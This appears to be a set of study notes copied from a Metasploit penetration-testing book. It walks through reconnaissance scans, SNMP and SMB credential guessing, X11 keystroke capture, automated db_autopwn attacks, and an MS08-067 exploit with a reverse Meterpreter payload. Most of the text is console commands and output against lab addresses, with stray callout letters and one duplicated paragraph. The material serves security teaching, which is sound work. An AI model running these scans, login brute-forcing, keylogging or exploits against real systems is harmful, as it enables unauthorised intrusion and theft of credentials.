Metasploit

Table of Contents

Intelligence Gathering

Reference: Metasploit Penetration Testers Guide Book

Passive Information Gathering

Whois Lookup

msf > whois secmaniac.net
[*] exec: whois secmaniac.net

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
 Domain Name: SECMANIAC.NET
 Created on: 03-Feb-10
 Expires on: 03-Feb-12
 Last Updated on: 03-Feb-10
XDomain servers in listed order:
 NS57.DOMAINCONTROL.COM
 NS58.DOMAINCONTROL.COM

NetCraft

Web-based tool that we can use to find the IP address of a server hosting a particular website.

NSLookup

root@bt:~# nslookup
set type=mx
> secmaniac.net

Server: 172.16.32.2
Address: 172.16.32.2#53

Non-authoritative answer:
secmaniac.net mail exchanger = 10 mailstore1.secureserver.net.
secmaniac.net mail exchanger = 0 smtp.secureserver.net.

Active Information Gathering

Nmap

root@bt:~# nmap -A -sS -Pn 172.16.32.131
Nmap scan report for 172.16.32.131
Host is up (0.00057s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
...
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows
Host script results:
|_nbstat: NetBIOS name: V-MAC-XP, NetBIOS user: <unknown>, NetBIOS MAC:
00:0c:29:c9:38:4c (VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: WORKGROUP\V-MAC-XP
Nmap done: 1 IP address (1 host up) scanned in 14.34 seconds

Ipidseq Scan

# In general, you should not set the THREADS value greater 16 when running Metasploit on Windows and not greater than 128 on UNIXlike operating systems.
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options
Module options:
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 GWHOST no The gateway IP address
 INTERFACE no The name of the interface
 LHOST no The local IP address
X RHOSTS yes The target address range or CIDR identifier
 RPORT 80 yes The target port
 SNAPLEN 65535 yes The number of bytes to capture
Y THREADS 1 yes The number of concurrent threads
 TIMEOUT 500 yes The reply read timeout in milliseconds

# Try scanning a host using the system at 192.168.1.109 shown at X by using the -sI command line flag to
specify the idle host
msf auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ipidseq) > set THREADS 50
THREADS => 50
msf auxiliary(ipidseq) > run
[*] 192.168.1.1's IPID sequence class: All zeros
[*] 192.168.1.10's IPID sequence class: Incremental!
[*] Scanned 030 of 256 hosts (011% complete)
[*] 192.168.1.116's IPID sequence class: All zeros
X [*] 192.168.1.109's IPID sequence class: Incremental!
[*] Scanned 128 of 256 hosts (050% complete)
[*] 192.168.1.154's IPID sequence class: Incremental!
[*] 192.168.1.155's IPID sequence class: Incremental!
[*] Scanned 155 of 256 hosts (060% complete)
[*] 192.168.1.180's IPID sequence class: All zeros
[*] 192.168.1.181's IPID sequence class: Incremental!
[*] 192.168.1.185's IPID sequence class: All zeros
[*] 192.168.1.184's IPID sequence class: Randomized
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ipidseq) >

# By using the idle host, we were able to discover a number of open ports on our target system without sending a single packet to the system.
msf auxiliary(ipidseq) > nmap -PN -sI 192.168.1.109 192.168.1.155
[*] exec: nmap -PN -sI 192.168.1.109 192.168.1.155
Idle scan using zombie 192.168.1.109 (192.168.1.109:80); Class: Incremental
Interesting ports on 192.168.1.155:
Not shown: 996 closed|filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:E4:59:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.12 seconds
msf auxiliary(ipidseq) >

Running Nmap from MSFconsole

msf > db_nmap -sS -A 172.16.32.131
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 172.16.32.131
Host is up (0.00056s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
21/tcp Xopen ftp Microsoft ftpd
25/tcp open smtp Microsoft ESMTP 6.0.2600.2180 Y
80/tcp open http Microsoft IIS webserver 5.1
|_html-title:
135/tcp open msrpc Microsoft Windows RPC
...
Host script results:
|_nbstat: NetBIOS name: IHAZSECURITY, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ea:26:7c
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: WORKGROUP\IHAZSECURITY
|_smbv2-enabled: Server doesn't support SMBv2 protocol
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 33.51 seconds

# check results
msf > db_services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.32.131 135 tcp msrpc open Microsoft Windows RPC
172.16.32.131 139 tcp netbios-ssn open
172.16.32.131 445 tcp microsoft-ds open Microsoft Windows XP microsoft-ds
172.16.32.131 777 tcp unknown open
172.16.32.131 1433 tcp ms-sql-s open Microsoft SQL Server 2005 9.00.1399; RTM

Port Scan in MSF

msf > search portscan

msf > use scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(syn) > set THREADS 50
THREADS => 50

msf auxiliary(syn) > run
X [*] TCP OPEN 192.168.1.155:135
[*] TCP OPEN 192.168.1.155:139
[*] TCP OPEN 192.168.1.155:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >

Targeted Scanning

When you are conducting a penetration test, there is no shame in looking
for an easy win. A targeted scan looks for specific operating systems, services,
program versions, or configurations that are known to be exploitable and
that provide an easy door into a target network. For example, it is common
to scan a target network quickly for the vulnerability MS08-067, as this is
(still) an extremely common hole that will give you SYSTEM access much
more quickly than scanning an entire target network for vulnerabilities.

Server Message Block Scanning

msf > use scanner/smb/smb_version

msf auxiliary(smb_version) > run
X [*] 192.168.1.155 is running Windows XP Service Pack 2 (language: English)
(name:DOOKIE-FA154354) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

# check results
msf auxiliary(smb_version) > db_hosts -c address,os_flavor
Hosts
=====
address os_flavor Svcs Vulns Workspace
------- --------- ---- ----- ---------
192.168.1.155 Windows XP 3 0 default
msf auxiliary(smb_version) >

Microsoft SQL Servers

When MS SQL is installed, it listens by default either on TCP port 1433
or on a random dynamic TCP port. If MS SQL is listening on a dynamic port,
simply query UDP port 1434 to discover on what dynamic TCP port MS SQL
is listening.

msf > use scanner/mssql/mssql_ping

msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(mssql_ping) > set THREADS 255
THREADS => 255
msf auxiliary(mssql_ping) > run
X [*] SQL Server information for 192.168.1.155:
[*] ServerName = V-XPSP2-BARE
Y [*] InstanceName = SQLEXPRESS
[*] IsClustered = No
Z [*] Version = 10.0.1600.22
[ [*] tcp = 1433

SSH Server Scanning

msf > use scanner/ssh/ssh_version

msf auxiliary(ssh_version) > run
[*] 192.168.1.1:22, SSH server version: SSH-2.0-dropbear_0.52
[*] Scanned 044 of 256 hosts (017% complete)
[*] 192.168.1.101:22, SSH server version: SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1
[*] Scanned 100 of 256 hosts (039% complete)
[*] 192.168.1.153:22, SSH server version: SSH-2.0-OpenSSH_4.3p2 Debian-8ubuntu1
[*] 192.168.1.185:22, SSH server version: SSH-2.0-OpenSSH_4.3

FTP Scanning

msf > use scanner/ftp/ftp_version
msf auxiliary(ftp_version) > show options
Module options:
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 FTPPASS mozilla@example.com no The password for the specified username
 FTPUSER anonymous no The username to authenticate as
 RHOSTS yes The target address range or CIDR identifier
 RPORT 21 yes The target port
 THREADS 1 yes The number of concurrent threads
 WORKSPACE no The name of the workspace to report data into
msf auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ftp_version) > set THREADS 255
THREADS => 255
msf auxiliary(ftp_version) > run
X [*] 192.168.1.155:21 FTP Banner: Minftpd ready

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(anonymous) > set THREADS 50
THREADS => 50
msf auxiliary(anonymous) > run
[*] Scanned 045 of 256 hosts (017% complete)
X [*] 192.168.1.155:21 Anonymous READ/WRITE (220 Minftpd ready)

Simple Network Management Protocol Sweeping

The Simple Network Management Protocol (SNMP) is typically used in network devices to report information such as bandwidth utilization, collision rates, and other information. However, some operating systems also have SNMP servers that can provide information such as CPU utilization, free memory, and other system-specific details. Convenience for the system administrator can be a gold mine for the penetration tester, and accessible SNMP servers can offer considerable information about a specific system or even make it possible to compromise a remote device. If, for instance, you can get the read/write SNMP community string for a Cisco router, you can download the router’s entire configuration, modify it, and upload it back to the router.

The Metasploit Framework includes a built-in auxiliary module called scanner/snmp/snmp_enum that is designed specifically for SNMP sweeps. Before you start the scan, keep in mind that the read-only (RO) and read/write (RW) community strings will play an important role in the type of information you will be able to extract from a given device. On Windows-based devices configured with SNMP, you can often use the RO or RW community strings to extract patch levels, running services, usernames, uptime, routes, and other information that can make things much easier for you during a pen test. The Metasploit Framework includes a built-in auxiliary module called scanner/snmp/snmp_enum that is designed specifically for SNMP sweeps. Before you start the scan, keep in mind that the read-only (RO) and read/write (RW) community strings will play an important role in the type of information you will be able to extract from a given device. On Windows-based devices configured with SNMP, you can often use the RO or RW community strings to extract patch levels, running services, usernames, uptime, routes, and other information that can make things much easier for you during a pen test. (Community strings are essentially passwords used to query a device for information or to write configuration information to the device.) After you guess the community strings, SNMP itself (depending on the version) can allow anything from excessive information disclosure to full system compromise. SNMPv1 and v2 are inherently flawed protocols. SNMPv3, which incorporates encryption and better check mechanisms, is significantly more secure. To gain access to a switch, you’ll first need to attempt to find its community strings. The Framework’s use scanner/snmp/snmp_login module will try a word list against one or a range of IP addresses. After you guess the community strings, SNMP itself (depending on the version) can allow anything from excessive information disclosure to full system compromise. SNMPv1 and v2 are inherently flawed protocols. SNMPv3, which incorporates encryption and better check mechanisms, is significantly more secure. To gain access to a switch, you’ll first need to attempt to find its community strings. The Framework’s use scanner/snmp/snmp_login module will try a word list against one or a range of IP addresses.

msf > use use scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(snmp_login) > set THREADS 50
THREADS => 50
msf auxiliary(snmp_login) > run
[*] >> progress (192.168.1.0-192.168.1.255) 0/30208...
X [*] 192.168.1.2 'public' 'GSM7224 L2 Managed Gigabit Switch'
Y [*] 192.168.1.2 'private' 'GSM7224 L2 Managed Gigabit Switch'
[*] Auxiliary module execution completed
msf auxiliary(snmp_login) >

References:

Vulnerability Scanning

The Basic Vulnerability Scan

Banner grabbing
is the act of connecting to a remote network service and reading the service identification (banner) that is returned. Many network services such as web, file transfer, and mail servers return their banner either immediately upon connecting to them or in response to a specific command

root@bt:/opt/framework3/msf3# nc 192.168.1.203 80
GET HTTP 1/1
HTTP/1.1 400 Bad Request
X Server: Microsoft-IIS/5.1

Specialty Vulnerability Scanners

Validating SMB Logins

To check the validity of a username and password combination, use the SMB Login Check Scanner to connect to a range of hosts. As you might expect, this scan is loud and noticeable, and each login attempt will show up in the event logs of every Windows box it encounters.

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-155
RHOSTS => 192.168.1.170-192.168.1.175
msf auxiliary(smb_login) > set SMBUser Administrator
SMBUser => Administrator
msf auxiliary(smb_login) > set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(smb_login) > run
[*] Starting host 192.168.1.154
...
[*] Scanned 6 of 6 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_login) >

Scanning for Open VNC Authentication

Metasploit’s built-in VNC Authentication None scanner searches a range of IP addresses for VNC servers that do not have a password configured (that support “None” authentication, meaning a blank password). Usually, this scan will turn up nothing of value, but a good penetration tester leaves no stone unturned when looking for ways access a target system.

msf > use auxiliary/scanner/vnc/vnc_none_auth
msf auxiliary(vnc_none_auth) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(vnc_none_auth) > run
...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(vnc_none_auth) >

Scanning for Open X11 Servers

msf > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(open_x11) > set THREADS 50
THREADS => 50
msf auxiliary(open_x11) > run
...
[*] Trying 192.168.1.253
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
...
[*] Auxiliary module execution completed

To see what an attacker could do with a vulnerability like this, start keystroke logging using Back|Track’s xspy tool, like so:

root@bt:/# cd /pentest/sniffers/xspy/
root@bt:/pentest/sniffers/xspy# ./xspy -display 192.168.1.23:0 -delay 100
ssh root@192.168.1.11(+BackSpace)37
sup3rs3cr3tp4s5w0rd
ifconfig
exit

Using Scan Results for Autopwning

use a Nessus results import to target a system and autopwn it. Create a new database with db_connect and use db_import to import the scan report. In the next example, we run db_autopwn with a series of switches to launch attacks against all targets (e), show all matching modules (t), use a reverse shell payload (r), select exploit modules based on vulnerability (x), and also select based on open ports (p).

msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import /root/nessus.nbe
msf > db_autopwn –e –t –r -x -p
X [*] (1/72 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin
against 192.168.33.130:1433...
[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.33.130:445...
[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against
192.168.33.130:445...
. . . SNIP . . .
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
Y [*] Meterpreter session 1 opened (192.168.1.101:40912 -> 192.168.1.115:15991)
[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...

Joy of Exploitation

All-Ports Payloads: Brute Forcing Ports

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
lhost => 192.168.33.129
smsf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
rhost => 192.168.33.130
msf exploit(ms08_067_netapi) > set TARGET 3
target => 3
msf exploit(ms08_067_netapi) > search ports
[*] Searching loaded modules for pattern 'ports'...
Compatible Payloads
===================
 Name Rank Description
 ---- ---- -----------
 windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection,
Reverse All-Port TCP Stager
 windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective
Injection), Reverse All-Port TCP Stager
. . . SNIP . . .
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j

Resource Files

Resource files are script files that automate commands within msfconsole. They contain a list of commands that are executed from msfconsole and run sequentially. Resource files can greatly reduce testing and development times, allowing you to automate many repetitive tasks, including exploitation. Resource files can be loaded from msfconsole with the resource command, or they can be passed as a command-line argument with the -r switch. The simple example shown next creates a resource file that displays our Metasploit version and then loads the sounds plug-in:

root@bt:/opt/framework3/msf3/ echo version > resource.rc X
root@bt:/opt/framework3/msf3/ echo load sounds >> resource.rc Y
root@bt:/opt/framework3/msf3/ msfconsole -r resource.rc Z
[ resource (resource.rc)> version
Framework: 3.7.0-dev.12220
Console : 3.7.0-dev.12220
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf >

# something more complex
root@bt:/opt/framework3/msf3/ echo use exploit/windows/smb/ms08_067_netapi > autoexploit.rc
root@bt:/opt/framework3/msf3/ echo set RHOST 192.168.1.155 >> autoexploit.rc
root@bt:/opt/framework3/msf3/ echo set PAYLOAD windows/meterpreter/reverse_tcp >> autoexploit.rc
root@bt:/opt/framework3/msf3/ echo set LHOST 192.168.1.101 >> autoexploit.rc
root@bt:/opt/framework3/msf3/ echo exploit >> autoexploit.rc
root@bt:/opt/framework3/msf3/ msfconsole